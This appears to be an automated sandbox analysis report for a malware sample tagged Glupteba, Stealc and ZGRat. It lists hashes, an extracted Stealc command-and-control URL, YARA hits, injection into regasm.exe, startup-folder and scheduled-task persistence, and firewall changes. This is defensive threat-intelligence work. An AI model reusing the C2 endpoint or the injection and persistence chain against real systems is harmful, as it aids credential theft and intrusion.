glupteba | a0e3a64e0e6aee3370ccbbca59f8ae0b34be674963c1dabe14926b24fdcae7d0

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 10:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe
Size

2.7MB
MD5

731ff38afbc5a664f5a458e222d91f84
SHA1

5105f89898a3d9e5b5b52ddcd7d0a3b167aaf701
SHA256

a0e3a64e0e6aee3370ccbbca59f8ae0b34be674963c1dabe14926b24fdcae7d0
SHA512

910b1c9fb8e28c3f24d35a875ff86f3ab2e2c573797e078ece204538a3bdc6d42bc92531197e57be577ffb2e4cacdd53fec6a61843e6c69be4794e68506f68c3
SSDEEP

24576:3RoBHi3buy4toE1jC6Ayo2xhWLbSPlqRvc68XzRVGvxB5VA0UC1dUUKj/OZ8j3g3:BoKmo4jC6TovDRUC1doj/Tg3

Score

10^/10

glupteba stealc zgrat dropper evasion execution loader rat stealer

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/6172-494-0x0000016F9CB00000-0x0000016FA0334000-memory.dmp	family_zgrat_v1
behavioral2/memory/6172-514-0x0000016FBAB70000-0x0000016FBAC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/6172-520-0x0000016FBAB20000-0x0000016FBAB44000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 21 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2608-77-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/4876-78-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/3008-79-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/1776-97-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/2608-145-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/4876-146-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/3008-147-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/1776-149-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/2608-201-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/4876-202-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/3008-209-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/1776-211-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/4876-330-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/3008-331-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/1776-332-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/2608-329-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/4876-461-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/2608-460-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/3008-462-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/1776-464-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral2/memory/3008-470-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba

Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Detect binaries embedding considerable number of MFA browser extension IDs. 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/952-231-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
behavioral2/memory/952-336-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/952-231-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
behavioral2/memory/952-336-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs

Detects Windows executables referencing non-Windows User-Agents 21 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2608-77-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/4876-78-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/3008-79-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/1776-97-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/2608-145-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/4876-146-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/3008-147-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/1776-149-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/2608-201-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/4876-202-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/3008-209-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/1776-211-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/4876-330-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/3008-331-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/1776-332-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/2608-329-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/4876-461-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/2608-460-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/3008-462-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/1776-464-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/3008-470-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/952-231-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral2/memory/952-336-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers

Detects executables (downlaoders) containing URLs to raw contents of a paste 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/464-1-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL

Detects executables Discord URL observed in first stage droppers 21 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2608-77-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/4876-78-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/3008-79-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/1776-97-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/2608-145-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/4876-146-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/3008-147-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/1776-149-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/2608-201-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/4876-202-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/3008-209-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/1776-211-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/4876-330-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/3008-331-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/1776-332-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/2608-329-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/4876-461-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/2608-460-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/3008-462-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/1776-464-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral2/memory/3008-470-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL

Detects executables containing URLs to raw contents of a Github gist 21 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2608-77-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-78-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3008-79-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1776-97-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2608-145-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-146-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3008-147-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1776-149-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2608-201-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-202-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3008-209-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1776-211-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-330-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3008-331-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1776-332-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2608-329-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-461-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2608-460-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3008-462-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1776-464-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3008-470-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

Detects executables containing artifacts associated with disabling Widnows Defender 21 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2608-77-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/4876-78-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/3008-79-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/1776-97-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/2608-145-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/4876-146-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/3008-147-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/1776-149-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/2608-201-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/4876-202-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/3008-209-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/1776-211-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/4876-330-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/3008-331-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/1776-332-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/2608-329-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/4876-461-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/2608-460-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/3008-462-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/1776-464-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral2/memory/3008-470-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender

Detects executables referencing many varying, potentially fake Windows User-Agents 21 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2608-77-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/4876-78-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/3008-79-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/1776-97-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/2608-145-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/4876-146-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/3008-147-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/1776-149-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/2608-201-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/4876-202-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/3008-209-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/1776-211-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/4876-330-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/3008-331-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/1776-332-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/2608-329-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/4876-461-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/2608-460-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/3008-462-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/1776-464-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral2/memory/3008-470-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2876	powershell.exe
5268	powershell.exe
5364	powershell.exe
6252	powershell.exe
6832	powershell.exe
7044	powershell.exe
5144	powershell.EXE
848	powershell.exe
3348	powershell.exe
5816	powershell.exe
5824	powershell.exe
5824	powershell.exe
4336	powershell.exe
5804	powershell.exe
5548	powershell.exe
1260	powershell.exe
1104	powershell.exe
5040	powershell.exe

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 4 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

6164 netsh.exe
6908 netsh.exe
2916 netsh.exe
2368 netsh.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

regasm.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation regasm.exe

pid	process
6164	netsh.exe
6908	netsh.exe
2916	netsh.exe
2368	netsh.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	regasm.exe

Drops startup file 6 IoCs

Processes:

regasm.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0yBkc9ovjvO7vQrEw4U9gaN7.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rrteWIV1mXZdY9JRO36QxkE4.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DgV2VVqXBqK8Fs26vPEvm0xV.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FHJfYbyGoMcD4edg0K9UWBAR.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrIohQZ5cwhxTqjU2AtkoaJK.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e3IDdxrhguBdwsvvC24Jny9M.bat	regasm.exe

Executes dropped EXE 5 IoCs

Processes:

t8FOhxUalE2vQKZaZXVY1Opx.exeDNZVPkobIhXsULJ7mGbVg7jM.exe99TxHB1tlFE0cLyRLsdu2Dhh.exet0ZJltHnOCycHjf0cl6WdLUo.exeRNrjlDvA4n49U6cuQXKGO066.exe

pid	process
4492	t8FOhxUalE2vQKZaZXVY1Opx.exe
2608	DNZVPkobIhXsULJ7mGbVg7jM.exe
4876	99TxHB1tlFE0cLyRLsdu2Dhh.exe
3008	t0ZJltHnOCycHjf0cl6WdLUo.exe
1776	RNrjlDvA4n49U6cuQXKGO066.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

8 pastebin.com
7 pastebin.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe

description pid process target process

PID 792 set thread context of 464 792 2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe regasm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3392 4492 WerFault.exe t8FOhxUalE2vQKZaZXVY1Opx.exe
6252 952 WerFault.exe u3gs.0.exe
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6572 schtasks.exe
7024 schtasks.exe
3600 schtasks.exe
5700 schtasks.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

regasm.exe

description pid process

Token: SeDebugPrivilege 464 regasm.exe

flow	ioc
8	pastebin.com
7	pastebin.com

description	pid	process	target process
PID 792 set thread context of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe

pid	pid_target	process	target process
3392	4492	WerFault.exe	t8FOhxUalE2vQKZaZXVY1Opx.exe
6252	952	WerFault.exe	u3gs.0.exe

pid	process
6572	schtasks.exe
7024	schtasks.exe
3600	schtasks.exe
5700	schtasks.exe

description	pid	process
Token: SeDebugPrivilege	464	regasm.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exeregasm.exe

description	pid	process	target process
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 792 wrote to memory of 464	792	2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe	regasm.exe
PID 464 wrote to memory of 4492	464	regasm.exe	t8FOhxUalE2vQKZaZXVY1Opx.exe
PID 464 wrote to memory of 4492	464	regasm.exe	t8FOhxUalE2vQKZaZXVY1Opx.exe
PID 464 wrote to memory of 4492	464	regasm.exe	t8FOhxUalE2vQKZaZXVY1Opx.exe
PID 464 wrote to memory of 2608	464	regasm.exe	DNZVPkobIhXsULJ7mGbVg7jM.exe
PID 464 wrote to memory of 2608	464	regasm.exe	DNZVPkobIhXsULJ7mGbVg7jM.exe
PID 464 wrote to memory of 2608	464	regasm.exe	DNZVPkobIhXsULJ7mGbVg7jM.exe
PID 464 wrote to memory of 4876	464	regasm.exe	99TxHB1tlFE0cLyRLsdu2Dhh.exe
PID 464 wrote to memory of 4876	464	regasm.exe	99TxHB1tlFE0cLyRLsdu2Dhh.exe
PID 464 wrote to memory of 4876	464	regasm.exe	99TxHB1tlFE0cLyRLsdu2Dhh.exe
PID 464 wrote to memory of 3008	464	regasm.exe	t0ZJltHnOCycHjf0cl6WdLUo.exe
PID 464 wrote to memory of 3008	464	regasm.exe	t0ZJltHnOCycHjf0cl6WdLUo.exe
PID 464 wrote to memory of 3008	464	regasm.exe	t0ZJltHnOCycHjf0cl6WdLUo.exe
PID 464 wrote to memory of 1776	464	regasm.exe	RNrjlDvA4n49U6cuQXKGO066.exe
PID 464 wrote to memory of 1776	464	regasm.exe	RNrjlDvA4n49U6cuQXKGO066.exe
PID 464 wrote to memory of 1776	464	regasm.exe	RNrjlDvA4n49U6cuQXKGO066.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-11_731ff38afbc5a664f5a458e222d91f84_megazord.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:464

C:\Users\Admin\Pictures\t8FOhxUalE2vQKZaZXVY1Opx.exe
"C:\Users\Admin\Pictures\t8FOhxUalE2vQKZaZXVY1Opx.exe"
3⤵
- Executes dropped EXE
PID:4492

C:\Users\Admin\AppData\Local\Temp\u3gs.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3gs.0.exe"
4⤵
PID:952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 2324
5⤵
- Program crash
PID:6252

C:\Users\Admin\AppData\Local\Temp\u3gs.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3gs.1.exe"
4⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
5⤵
PID:6172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1428
4⤵
- Program crash
PID:3392

C:\Users\Admin\Pictures\DNZVPkobIhXsULJ7mGbVg7jM.exe
"C:\Users\Admin\Pictures\DNZVPkobIhXsULJ7mGbVg7jM.exe"
3⤵
- Executes dropped EXE
PID:2608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5824

C:\Users\Admin\Pictures\DNZVPkobIhXsULJ7mGbVg7jM.exe
